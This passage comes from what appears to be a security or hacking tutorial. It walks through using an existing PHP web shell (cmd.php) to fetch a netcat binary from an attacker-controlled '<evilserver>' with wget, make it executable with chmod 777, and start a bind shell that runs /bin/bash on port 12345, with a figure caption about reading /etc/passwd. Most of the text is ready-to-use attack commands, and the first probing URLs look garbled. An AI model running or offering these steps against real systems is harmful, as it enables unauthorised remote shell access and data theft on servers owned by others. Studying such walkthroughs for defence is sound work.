Netcat is considered the “TCP/IP Swiss Army Knife” due to its incredible flexibility and power. While the entire potential of Netcat is beyond the scope of this article, it is definitely within context to illustrate how an attacker can leverage Netcat to gain shell access, and thus a more powerful interface, to the target system.
There is a small chance that the target system may have Netcat installed. To test this, simply execute the following:
http://<target>/cmd.php?cmd=wget http://<evilserver>/cmd.php?cmd=nc –h
http://<target>/cmd.php?cmd=wget http://<evilserver>/cmd.php?cmd=netcat –h
If the browser fills with a bunch of text relating the Netcat’s usage, then you can skip the next step. Otherwise, from your mirrored test environment, download the Netcat source files from http://netcat.sourceforge.net, configure and compile the code, and transfer the binary to a remote web server under your control.
Once this step is complete, transfer it to the target system using the following command:
http://<target>/cmd.php?cmd=wget http://<evilserver>/netcat –O netcat
Now that the file is on the server, you need to change its “mode.” Although the Netcat file might execute on your test environment, when it is transferred to the target system, the executable properties of the file are lost. Fortunately, this is easy to update via the following command:
http://<target>/cmd.php?cmd=chmod 777 netcat
This command changes the mode of the file to permit anyone to read the file, change the file, or execute the file. For more details on this command, check out http://en.wikipedia.org/wiki/Chmod.
With the files mode properly set, you can now execute it to create a listener on the target system that will grant you command-line access. To do this, execute the following:
http://<target>/cmd.php?cmd=./netcat -l -vvv -p 12345 –e /bin/bash
This command tells Netcat to listen (-l) on port 12345 (-p), to be very verbose in response (-v), and to execute (-e) the incoming text through the bash shell (/bin/bash). The end result looks like what appears in Figure 2.
Figure 2 Connecting to Netcat listener to view /etc/passwd